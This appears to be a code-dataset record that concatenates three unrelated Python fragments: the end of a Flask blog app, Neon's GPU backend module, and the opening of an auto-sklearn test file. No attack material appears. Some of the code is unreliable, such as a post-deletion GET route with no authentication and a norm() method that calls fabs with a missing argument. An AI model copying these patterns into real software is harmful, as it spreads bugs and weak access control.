posts = db_sess.query(Posts).order_by(Posts.id.desc()).all() view = render_template('blog.html', **params, posts=posts) db_sess.close() return view @app.route('/add_post', methods=['GET', 'POST']) def add_post(): params = {'title': 'Добавление поста', 'action_type': 'Добавление поста', 'submit_text': 'Добавить'} form = EditPostForm() params['form'] = form if form.validate_on_submit(): return edit_post_in_data_base(form, None) return render_template('edit_post.html', **params) @app.route('/edit_post/<int:post_id>', methods=['GET', 'POST']) def edit_post(post_id: int): params = {'title': 'Редактирование поста', 'action_type': 'Редактирование поста', 'submit_text': 'Редактировать'} form = EditPostForm() params['form'] = form db_sess = db_session.create_session() post: Posts = db_sess.query(Posts).filter(Posts.id == post_id).first() db_sess.close() if not post: return redirect('/') if request.method == 'GET': form.title.data = post.title form.text.data = post.text form.author.data = post.author elif form.validate_on_submit(): return edit_post_in_data_base(form, post) return render_template('edit_post.html', **params) @app.route('/delete_post/<int:post_id>') def delete_post(post_id: int): db_sess = db_session.create_session() post = db_sess.query(Posts).filter(Posts.id == post_id).first() if post: db_sess.delete(post) db_sess.commit() db_sess.close() return redirect('/') def main(): db_session.global_init(app.config['DATA_BASE']) app.run('127.0.0.1', 8080) if __name__ == '__main__': main()
2.25
2
neon/backends/gpu.py
kashif/neon
1
11854
# ---------------------------------------------------------------------------- # Copyright 2014 Nervana Systems Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------- """ Neon backend wrapper for the NervanaGPU library. Most functions are thin wrappers around functions from the NervanaGPU class, the GPUTensor is taken directly from NervanaGPU as well. NervanaGPU is available at `<https://github.com/NervanaSystems/nervanagpu>` """ import logging from neon.backends.backend import Backend from nervanagpu import NervanaGPU from neon.diagnostics.timing_decorators import FlopsDecorator import pycuda.driver as drv import numpy as np logger = logging.getLogger(__name__) class GPU(Backend): """ Sets up a NervanaGPU based backend for matrix operations. Note that some functions defined in the generic Backend class such as cross-map pooling and normalization and are not implemented for this backend. """ default_dtype = np.float32 def __init__(self, rng_seed, stochastic_round=False, device_id=0): import pycuda.driver as drv drv.init() global ctx ctx = drv.Device(device_id).make_context() import atexit atexit.register(ctx.pop) self.ng = NervanaGPU(stochastic_round=stochastic_round) logger.info("Initialized NervanaGPU with stochastic_round=%s", stochastic_round) self.rng_seed = rng_seed self.rng_init() self.device_id = device_id if device_id is not None else 0 def __getstate__(self): """ Defines what and how we go about serializing an instance of this class. Returns: self.__dict__: The full contents of the backend class instance, except for the mem_pool which is on device and cannot be serialized. """ if hasattr(self, 'mem_pool') and self.mem_pool is not None: self.mem_pool_pickle = {'shape': self.mem_pool.shape, 'dtype': np.float32} self.mem_pool = None return self.__dict__ def __setstate__(self, state): """ Defines how we go about deserializing into an instance of this class. Arguments: self.__dict__: The full contents of the backend class instance, except for the mem_pool which is on device and cannot be serialized. """ self.__dict__.update(state) self.mem_pool = self.ng.empty(self.mem_pool_pickle['shape'], dtype=self.mem_pool_pickle['dtype']) def init_mempool(self, shape, dtype=default_dtype): """ Allocates a memory pool for temporary storage """ self.mem_pool = self.ng.empty(shape, dtype=dtype) def alloc_host_mem(self, shape, dtype=default_dtype): return drv.pagelocked_empty(shape, dtype, order="C", mem_flags=0) def create_stream(self): return drv.Stream() def synchronize(self): pass def async_copy(self, dest, src, stream=None): drv.memcpy_htod_async(dest.gpudata, src, stream) def rng_init(self): """ Initialize and seed the pseudo random number genrator. Random numbers are generated on the host using numpy, then transfered to device. """ seed = None if 'rng_seed' in self.__dict__: seed = self.rng_seed logger.info("Seeding random number generator with: %s", str(seed)) np.random.seed(seed) def flop_timing_init(self, decorate_fc, decorate_conv, decorate_ew): """ Initialize FLOP timing. Wraps the specified MOP calls via a decorator to record elapsed time and number of operations. Arguments: decorate_fc (list): string giving the function names of fully connected layer forward/backward/update calls to time. decorate_conv (list): string giving the function names of convolutional layer forward/backward/update calls to time. decorate_ew (list): string giving the function names of element-wise calls to time. Notes: Must be called prior to first flop_timing_start call """ self.start = drv.Event() self.end = drv.Event() self.flop_timer = FlopsDecorator(self) self.flop_timer.decorate(decorate_fc=decorate_fc, decorate_conv=decorate_conv, decorate_ew=decorate_ew) def flop_timinig_start(self): """ Start a new FLOP timer. Returns: None: dummy value (not used) """ return self.start.record() def flop_timing_finish(self, start_time): """ Complete current FLOP timing. Arguments: start_time (unused): ignored. Returns: float: elapsed time in seconds since prior flop_timing_start call. """ self.end.record() self.end.synchronize() return self.end.time_since(self.start) def uniform(self, low=0.0, high=1.0, size=1, dtype=default_dtype, persist_values=True, name=None): """ generate numpy random number and convert to a GPUTensor. If called with dype=None it will probably explode """ ary = np.random.uniform(low, high, size) return self.ng.array(ary, dtype=dtype, name=name) def normal(self, loc=0.0, scale=1.0, size=1, dtype=default_dtype, persist_values=True, name=None): """ Gaussian/Normal random number sample generation """ ary = np.random.normal(loc, scale, size) return self.ng.array(ary, dtype=dtype, name=name) def fprop_fc(self, out, inputs, weights, layer=None): """ Forward propagate the inputs of a fully connected network layer to produce output pre-activations (ready for transformation by an activation function). Arguments: out (GPUTensor): Where to store the forward propagated results. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. weights (GPUTensor): The weight coefficient values for this layer. layer (Layer): The layer object. """ self.ng.dot(weights, inputs, out) def bprop_fc(self, out, weights, deltas, layer=None): """ Backward propagate the error through a fully connected network layer. Arguments: out (GPUTensor): Where to store the backward propagated errors. weights (GPUTensor): The weight coefficient values for this layer. deltas (GPUTensor): The error values for this layer layer (Layer): The layer object. """ self.ng.dot(weights.T, deltas, out) def update_fc(self, out, inputs, deltas, layer=None): """ Compute the updated gradient for a fully connected network layer. Arguments: out (GPUTensor): Where to store the updated gradient value. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. deltas (GPUTensor): The error values for this layer layer (Layer): The layer object. """ self.ng.dot(deltas, inputs.T, out) def update_fc_bias(self, err, out): """ Compute the updated bias gradient for a fully connected network layer. Arguments: out (GPUTensor): Where to store the updated gradient value. err (GPUTensor): backpropagated error """ self.ng.sum(err, axis=1, out=out) def add_fc_bias(self, inputs, bias): """ Add the bias for a fully connected network layer. Arguments: inputs (GPUTensor): the input to update. bias (GPUTensor): the amount to increment """ self.ng.add(inputs, bias, out=inputs) def fprop_conv(self, out, inputs, weights, ofmshape, ofmsize, ofmlocs, ifmshape, links, nifm, padding, stride, ngroups, fpropbuf, local=False): """ Forward propagate the inputs of a convolutional network layer to produce output pre-activations (ready for transformation by an activation function). Arguments: out (GPUTensor): Where to store the forward propagated results. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. weights (GPUTensor): The weight coefficient values for this layer. ofmshape (tuple): Dimensions of each output feature map (typically number of height and width neurons). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. ifmshape (tuple): Dimensions of each input feature map (typically number of height and width neurons). For this backend we expect these values to be square. links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the convolution operation. stride (int): Number of neurons to shift the filter at each step. ngroups (int): Number of groups. fpropbuf (GPUTensor): Temporary storage buffer used to hold the convolved outputs for a single receptive field. Not used for this backend. local (bool, optional): Whether to do local filtering (True) or convolution (False, the default) """ ''' N: Number of images in mini-batch C: Number of input feature maps K: Number of output feature maps D: Depth of input image H: Height of input image W: Width of input image T: Depth of filter kernel R: Height of filter kernel S: Width of filter kernel ''' self.ng.fprop_conv(layer=fpropbuf, I=inputs, F=weights, O=out, alpha=1.0, repeat=1) def bprop_conv(self, out, weights, deltas, ofmshape, ofmsize, ofmlocs, ifmshape, links, padding, stride, nifm, ngroups, bpropbuf, local=False): """ Backward propagate the error through a convolutional network layer. Arguments: out (GPUTensor): Where to store the backward propagated errors. weights (GPUTensor): The weight coefficient values for this layer. deltas (GPUTensor): The error values for this layer ofmshape (tuple): Dimensions of each output feature map (typically height and width). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. ifmshape (tuple): Dimensions of each input feature map (typically height and width). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the convolution operation. stride (int): Number of neurons to shift the filter at each step. ngroups (int): Number of groups. bpropbuf (GPUTensor): Temporary storage buffer used to hold the backpropagated error for a single receptive field local (bool, optional): Whether to do local filtering (True) or convolution (False, the default) """ self.ng.bprop_conv(layer=bpropbuf, F=weights, E=deltas, grad_I=out, alpha=1.0, repeat=1) def update_conv(self, out, inputs, weights, deltas, ofmshape, ofmsize, ofmlocs, ifmshape, links, nifm, padding, stride, ngroups, fwidth, updatebuf, local=False, layer=None): """ Compute the updated gradient for a convolutional network layer. Arguments: out (GPUTensor): Where to store the updated gradient value. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. weights (GPUTensor): The weight coefficient values for this layer. deltas (GPUTensor): The error values for this layer ofmshape (tuple): Dimensions of each output feature map (typically height and width). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. ifmshape (tuple): Dimensions of each input feature map (typically height and width). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the convolution operation. stride (int): Number of neurons to shift the filter at each step. ngroups (int): Number of groups. fwidth (int): Filter width. updatebuf (GPUTensor): Temporary storage buffer used to hold the updated gradient for a single receptive field local (bool, optional): Whether to do local filtering (True) or convolution (False, the default) layer (Layer): The layer object. """ self.ng.update_conv(layer=updatebuf, I=inputs, E=deltas, grad_F=out, alpha=1.0, repeat=1) def fprop_pool(self, out, inputs, op, ofmshape, ofmsize, ofmlocs, fshape, ifmshape, links, nifm, padding, stride, fpropbuf): """ Forward propagate the inputs of a Pooling network layer to produce output pre-activations (ready for transformation by an activation function). Arguments: out (GPUTensor): Where to store the forward propagated results. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. op (string): The type of pooling operation to apply. We support "max", "avg", "l2" currently. ofmshape (tuple): Dimensions of each output feature map (typically number of height and width neurons). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. fshape (tuple): Dimensions of each filter (typically height and width). ifmshape (tuple): Dimensions of each input feature map (typically number of height and width neurons). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the pooling operation. stride (int): Number of neurons to shift the filter at each step. fpropbuf (GPUTensor): Temporary storage buffer used to hold the pooled outputs for a single receptive field. """ op = op.lower() if op == "max": self.ng.fprop_pool(layer=fpropbuf, I=inputs, O=out, repeat=1) else: raise AttributeError("unexpected pooling op type: %s", op) def bprop_pool(self, out, fouts, inputs, deltas, op, ofmshape, ofmsize, ofmlocs, fshape, fpsize, ifmshape, links, nifm, padding, stride, bpropbuf): """ Backward propagate the error through a pooling network layer. Arguments: out (GPUTensor): Where to store the backward propagated errors. fouts (GPUTensor): Forward propagated outputs from the previous layer. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. deltas (GPUTensor): The error values for this layer op (string): The type of pooling operation to apply. We support "max", "avg", "l2" currently. ofmshape (tuple): Dimensions of each output feature map (typically height and width). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. fshape (tuple): Dimensions of each filter (typically height and width). fpsize (int): The size of each filter. ifmshape (tuple): Dimensions of each input feature map (typically height and width). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the pooling operation. stride (int): Number of neurons to shift the filter at each step. bpropbuf (GPUTensor): Temporary storage buffer used to hold the backpropagated error for a single receptive field """ op = op.lower() if op == "max": self.ng.bprop_pool(layer=bpropbuf, I=inputs, E=deltas, grad_I=out, repeat=1) else: raise AttributeError("unexpected pooling op type: %s", op) def logistic(self, x, out): """ Logistic sigmoid nonlinearity, 1/(1+exp(-x)) Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor """ self.ng.sig(x, out=out) return out def transpose(self, untransposed, transposed): transposed[:] = untransposed.T def crossent(self, y, t, partial, out, epsilon, doscale, ismulti=False): """ Computes cross entropy cost. Arguments: y (GPUTensor): Model outputs t (GPUTensor): Targets partial (GPUTensor): temporary buffer used for 2D reduction out (GPUTensor): Storage for the cross entropy output epsilon (float): constant for numerical stability doscale (boolean): If True, cross_entropy is scaled by batch size ismulti (boolean): If True, compute multi class cross_entropy """ sumbuf = partial.reshape((partial.size, 1))[:partial.shape[0]] if ismulti: self.ng.sum(-t * self.ng.log(y + epsilon), axis=None, partial=sumbuf, out=out) else: self.ng.sum((t - 1) * self.ng.log(1 - y + epsilon) - t * self.ng.log(y + epsilon), axis=None, partial=sumbuf, out=out) if doscale: out[:] = out / y.shape[1] return out def logistic_compound(self, inputs, outputs): """ Applies logistic function and its derivative to the dataset passed. Arguments: inputs (GPUTensor): Input data to be transformed. This also acts as storage for the output of the derivative function. outputs (GPUTensor): Storage for the transformed output. """ # Apply the logistic function. outputs[:] = self.ng.sig(inputs) inputs[:] = (1.0 - outputs) * inputs def rectlin(self, x, out): """ Rectified Linear nonlinearity Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor """ self.ng.maximum(x, 0., out=out) return out def rectlin_derivative(self, x, out): """ Rectified linear nonlinearity derivative Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor """ self.ng.greater(x, 0, out=out) return out def rectleaky(self, x, slope, out): """ Leaky rectified linear nonlinearity Arguments: x (GPUTensor): Input tensor slope (float): amount of gradient to apply when unit is not active out (GPUTensor): Output tensor """ out[:] = self.ng.maximum(x, x*slope) def rectleaky_derivative(self, x, slope, out): """ Leaky rectified linear nonlinearity derivative Arguments: x (GPUTensor): Input tensor slope (float): amount of gradient to apply when unit is not active out (GPUTensor): Output tensor """ out[:] = self.ng.greater(x, 0) * (1.0 - slope) + slope def sum(self, tsr, axes, out): """ Sum Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.sum(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.sum(tsr, axis=axes, out=out) return out def norm(self, tsr, order=None, axis=None, out=None): """ Calculates and returns the vector p-norms of the GPUTensor along the specified axis. The p-norm is defined on a vector A as :math:`||A||_p = \sum_i(|A_i|^p)^{1/p}`. Arguments: tsr (GPUTensor): the GPUTensor on which to find the norms order (int): The order or p upon which the norm is calculated. Valid values include: None, inf, -inf, 0, 1, -1, 2, -2, ... axis (int): The axis along which to compute vector norms. out (GPUTensor): where to write the results to. Must be of the expected result shape. Returns: GPUTensor: p-norm of tsr along the specified axis. Raises: IndexError if invalid axis specified AttributeError if invalid order specified See Also: `numpy.linalg.norm` """ if not isinstance(axis, int) or axis < 0 or axis >= len(tsr.shape): raise IndexError("invalid axis value: %s", axis) if not isinstance(order, (int, float)): raise AttributeError("invalid order value: %s", order) if out is None: raise AttributeError("No output tensor speficied", order) if order == float('Inf'): self.ng.max(self.fabs(tsr), axis, out) elif order == float('-Inf'): self.ng.min(self.fabs(tsr), axis, out) elif order == 0: tmp = self.zeros(tsr.shape) self.ng.not_equal(tsr, tmp, tmp) self.ng.sum(tmp, axis, out) else: tmp = self.empty(tsr.shape) self.ng.power(self.fabs(tsr), order, tmp) self.ng.sum(tmp, axis, out) self.ng.power(out, (1.0 / order), out) return out def mean(self, tsr, axes, out): """ Calculates the arithmetic mean of the elements along the specified axes. Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.mean(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.mean(tsr, axis=axes, out=out) return out def min(self, tsr, axes, out): """ Calculates the minimum of the elements along the specified axes. Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.min(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.min(tsr, axis=axes, out=out) return out def max(self, tsr, axes, out): """ Calculates the maximum of the elements along the specified axes. Arguments: tsr (GPUTensor): Input tensor axes (int): Axis along which the reduction is performed. If axes is None, the tensor is flattened and reduced over both dimensions. out (GPUTensor): Output tensor """ if axes is None: sze = tsr.shape[0]*tsr.shape[1] self.ng.max(tsr.reshape(sze, 1), axis=0, out=out) else: self.ng.max(tsr, axis=axes, out=out) return out def variance(self, tsr, axes, out, mean=None): """ Calculates the variance of the elements along the specified axes. Arguments: tsr (GPUTensor): the tensor on which to compute the variance axes (int, list, optional): the dimension(s) along which to variance. If set to None, we will variance over all dimensions. out (GPUTensor): where the result will be stored. mean (GPUTensor): the tensor containing mean of tsr Returns: GPUTensor: reference to out """ if mean is None: logger.error("GPUTensor requires mean to be specified.") raise ValueError("mean not specified") self.ng.mean(self.ng.square(tsr-mean), axis=axes, out=out) return out def fabs(self, x, out): """ Calculates absolute value of the elements in a tensor Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor Returns: GPUTensor: reference to out """ self.ng.fabs(x, out=out) return out def sqrt(self, x, out): """ Calculates square root of the elements in a tensor Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor Returns: GPUTensor: reference to out """ self.ng.sqrt(x, out=out) return out def zeros(self, shape, dtype=default_dtype, persist_values=True): """ Allocate a new GPUTensor and fill it with zeros. Arguments: shape (tupel): Shape of the desired GPUTensor dtype (dtype): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: GPUTensor: output """ return self.ng.zeros(shape, dtype=dtype) def ones(self, shape, dtype=default_dtype, persist_values=True): """ Allocate a new GPUTensor and fill it with ones. Arguments: shape (tupel): Shape of the desired GPUTensor dtype (dtype): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: GPUTensor: output """ return self.ng.ones(shape, dtype=dtype) def zeros_like(self, ary, dtype=default_dtype, persist_values=True, name=None): """ Instantiate a new instance of this backend's Tensor class, with the shape taken from ary and populating each element with a value of 0. Arguments: ary (tensor object): Tensor to inherit the dimensions of. dtype (data-type, optional): If present, specifies the underlying type to employ for each element. persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: Tensor: array object Raises: NotImplementedError: Can't be instantiated directly. See Also: :py:func:`~neon.backends.backend.Backend.empty`, :py:func:`~neon.backends.backend.Backend.ones`, :py:func:`~neon.backends.backend.Backend.array` """ return self.zeros(ary.shape, dtype=dtype, persist_values=persist_values) def empty_like(self, ary, dtype=default_dtype, persist_values=True, name=None): """ Instantiate a new instance of this backend's Tensor class, with the shape taken from ary. Arguments: ary (tensor object): Tensor to inherit the dimensions of. dtype (data-type, optional): If present, specifies the underlying type to employ for each element. persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: Tensor: array object Raises: NotImplementedError: Can't be instantiated directly. See Also: :py:func:`~neon.backends.backend.Backend.empty`, :py:func:`~neon.backends.backend.Backend.ones`, :py:func:`~neon.backends.backend.Backend.array` """ return self.empty(ary.shape, dtype=dtype, persist_values=persist_values, name=name) def empty(self, shape, dtype=default_dtype, persist_values=True, name=None): """ Allocate a new GPUTensor. Arguments: shape (tupel): Shape of the desired GPUTensor dtype (dtype): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls Returns: GPUTensor: output """ return self.ng.empty(shape, dtype=dtype) def copy(self, ary): """ returns a copy of ary """ res = self.empty_like(ary) res.copy(ary) return res def array(self, ary, dtype=default_dtype, persist_values=True, name=None, allocator=drv.mem_alloc): """ Allocate a new GPUTensor and fill it with supplied numpy array. Arguments: ary (ndarray): Numpy array with source data dtype (dtype, optional): Optional datatype persist_values (bool, optional): If set to True (the default), the values assigned to this Tensor will persist across multiple begin and end calls. Setting to False may provide a performance increase if values do not need to be maintained across such calls name (string): Name for the GPUTensor allocator (pycuda): Pycuda memory allocator Returns: GPUTensor: output """ return self.ng.array(ary, dtype=dtype, name=name) def add(self, left, right, out): """ Elementwise addition Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.add(left, right, out=out) return out def subtract(self, left, right, out): """ Elementwise subtraction Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.subtract(left, right, out=out) return out def multiply(self, left, right, out): """ Elementwise multiplication Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.multiply(left, right, out=out) return out def divide(self, left, right, out): """ Elementwise division Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.divide(left, right, out=out) return out def greater(self, left, right, out): """ Elementwise greater than testing Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.greater(left, right, out=out) return out def equal(self, left, right, out): """ Performs element-wise equality testing on each element of left and right, storing the result in out. Each operand is assumed to be the same shape (or broadcastable as such). Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.equal(left, right, out=out) return out def not_equal(self, left, right, out): """ Elementwise not equal testing Arguments: left (GPUTensor, numeric): left-hand side operand. right (GPUTensor, numeric): right-hand side operand. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.not_equal(left, right, out=out) return out def clip(self, a, a_min, a_max, out): """ Elementwise clipping between a range of specified values Arguments: a (GPUTensor): input tensor. a_min (float): floor value. a_max (float): ceiling value. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.clip(a, a_min, a_max, out=out) return out def log(self, a, out): """ Elementwise base-e logarithm Arguments: a (GPUTensor): input tensor. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.log(a, out=out) return out def tanh(self, a, out): """ Elementwise tanh Arguments: a (GPUTensor): input tensor. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ self.ng.tanh(a, out=out) return out def argmax(self, a, out, axis=0): """ Calculates the indices of the maximal element value along the specified axis. If multiple elements contain the maximum, only the elements of the first are returned. Arguments: tsr (GPUTensor): The GPUTensor on which to find the maximum indices axis (int): The dimension along which to find the maximum. If set to None, find the overall maximum index of a flattened representation of tsr. out (GPUTensor): Where to store the result. Should be of the appropriate type and expected shape Returns: GPUTensor: reference to out """ self.ng.argmax(a, out=out, axis=axis) return out def softmax(self, x, out): """ Softmax nonlinearity. Computes exp(x-max(x)) / sum_i exp(x_i-max(x_i)) Arguments: x (GPUTensor): input tensor. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ out[:] = (self.ng.reciprocal(self.ng.sum( self.ng.exp(x - self.ng.max(x, axis=0)), axis=0)) * self.ng.exp(x - self.ng.max(x, axis=0))) return out def softmax_gradient(self, y, err, out): """ Gradient of the softmax nonlinearity. Arguments: y (GPUTensor): input tensor. err (GPUTensor): backpropagated error. out (GPUTensor): where the result will be stored. Returns: GPUTensor: reference to out """ raise NotImplementedError("Softmax gradient should use shortcut") return out def make_binary_mask(self, tsr, keepthresh=0.5, dtype=default_dtype): """ Create a binary mask for dropout layers. Arguments: tsr (GPUTensor): Output tensor keepthresh (float): fraction of ones """ self.ng.dropout(keep=keepthresh, out=tsr) def gdm_compound(self, ps_item, us_item, vs_item, momentum_coef, learning_rate, epoch): """ Perform gradient descent update with momentum. Arguments: ps_item (GPUTensor): parameter tensor (e.g. a weight matrix) us_item (GPUTensor): update tensor, contains gradient wrt. weights vs_item (GPUTensor): velocity tensor. momentum_coef (float): momentum coefficient. learning_rate (float): learning rate. epoch (int): epoch (used in conjunction with diagnostics). Outputs are written to vs_item (updated velocity) and ps_item (updated weights) """ vs_item[:] = vs_item * momentum_coef - us_item * learning_rate ps_item[:] = ps_item + vs_item def gdmwd_compound(self, ps_item, us_item, vs_item, momentum_coef, learning_rate, wd, epoch): """ Perform gradient descent update with momentum and weight decay. Arguments: ps_item (GPUTensor): parameter tensor (e.g. a weight matrix) us_item (GPUTensor): update tensor, contains gradient wrt. weights vs_item (GPUTensor): velocity tensor. momentum_coef (float): momentum coefficient. learning_rate (float): learning rate. wd (float): weight decay parameter. epoch (int): epoch (used in conjunction with diagnostics). Outputs: ps_item, the updated weights. vs_item, the updated velocity. us_item, used as a temp buffer. """ vs_item[:] = (vs_item * momentum_coef - us_item * learning_rate - ps_item * learning_rate * wd) ps_item[:] = ps_item + vs_item def exp_mavg(self, mavg, newval, rho): """ Calculate the exponential moving average Arguments: mavg: The running value of the moving average newval: New sample to be added to the moving average rho: Interpolation value """ mavg[:] = rho * mavg + (1.0 - rho) * newval def ada_update(self, ps_item, us_item, gs_item, ds_item, ls_item, ss_item, rho, epsilon): """ Update rule for AdaDelta (Zeiler, http://arxiv.org/abs/1212.5701) Arguments: ps_item: weight / parameter (will be updated) us_item: update gs_item: expected value of Gradient Squared (will be updated) ds_item: expected value of Delta Squared (will be updated) ls_item: learning rate (will be updated) ss_item: Scratch Space rho: decay constant (determines window size) epsilon: small positive constant for numerical stability """ # Accumulate E[Grad^2] gs_item[:] = gs_item * rho + (1.0 - rho) * us_item * us_item # Calculate Updates ls_item[:] = self.ng.sqrt((ds_item + epsilon) / (gs_item + epsilon)) * (-1.0) * us_item # Accumulate E[Delt^2] ds_item[:] = ds_item * rho + (1.0 - rho) * ls_item * ls_item # Final update to the params ps_item[:] = ps_item + ls_item def rms_update(self, params, updates, run_squares, velocity, scratch_space, gamma, epsilon, learning_rate, momentum_coef): # Update running squares run_squares[:] = gamma * run_squares + (1. - gamma) * updates * updates # Now scale the gradient by lr / rms(grad) (with a epsilon term for # stability) and use it to update the params if momentum_coef == 0: params[:] = params - learning_rate * updates * self.ng.reciprocal( self.ng.sqrt(run_squares) + epsilon) else: velocity[:] = velocity * momentum_coef - \ learning_rate * updates * \ self.ng.reciprocal(self.ng.sqrt(run_squares) + epsilon) params[:] = params + velocity def fprop_bn_compound(self, inputs, beta, gamma, eps, xhat, xmean, xvar, gmean, gvar, rho, out): """ Batch normalization forward pass, compounded to run in 3 kernel calls. Arguments: inputs: input data to be normalized beta: location parameter gamma: scale parameter eps: small constant for numerical stability xvar: variance (updated) xhat: normalized input (updated) out: normalized and rescaled input (updated) """ xvar[:] = self.ng.var(inputs, axis=1) xmean[:] = self.ng.mean(inputs, axis=1) gmean[:] = gmean * rho + (1.0 - rho) * xmean gvar[:] = gvar * rho + (1.0 - rho) * xvar xvar[:] = self.ng.reciprocal(self.ng.sqrt(xvar + eps)) xhat[:] = xvar * (inputs - xmean) out[:] = xhat * gamma + beta return out def bprop_bn_compound(self, xhat, error, xvar, gamma, beta_updates, gamma_updates): """ Batch normalization backward pass, compounded to run with 4 kernel calls. Arguments: xhat: normalized input data (updated) error: backpropagated deltas (updated) xvar: precomputed variance gamma: scale parameter beta_updates: gradient update for beta (updated) gamma_updates: gradient update for gamma (updated) """ gamma_updates[:] = self.ng.sum(xhat * error, axis=1) beta_updates[:] = self.ng.sum(error, axis=1) xhat[:] = (xhat * gamma_updates + beta_updates) / float(xhat.shape[1]) error[:] = xvar * gamma * (error - xhat)
1.914063
2
test/test_automl/test_automl.py
ihounie/auto-sklearn
0
11855
# -*- encoding: utf-8 -*- import os import pickle import sys import time import glob import unittest import unittest.mock import numpy as np import pandas as pd import sklearn.datasets from smac.scenario.scenario import Scenario from smac.facade.roar_facade import ROAR from autosklearn.util.backend import Backend from autosklearn.automl import AutoML import autosklearn.automl from autosklearn.data.xy_data_manager import XYDataManager from autosklearn.metrics import accuracy, log_loss, balanced_accuracy import autosklearn.pipeline.util as putil from autosklearn.util.logging_ import setup_logger, get_logger from autosklearn.constants import MULTICLASS_CLASSIFICATION, BINARY_CLASSIFICATION, REGRESSION from smac.tae.execute_ta_run import StatusType sys.path.append(os.path.dirname(__file__)) from base import Base # noqa (E402: module level import not at top of file) class AutoMLStub(AutoML): def __init__(self): self.__class__ = AutoML self._task = None class AutoMLTest(Base, unittest.TestCase): _multiprocess_can_split_ = True def setUp(self): super().setUp() self.automl = AutoMLStub() self.automl._shared_mode = False self.automl._seed = 42 self.automl._backend = unittest.mock.Mock(spec=Backend) self.automl._delete_output_directories = lambda: 0 def test_refit_shuffle_on_fail(self): backend_api = self._create_backend('test_refit_shuffle_on_fail') 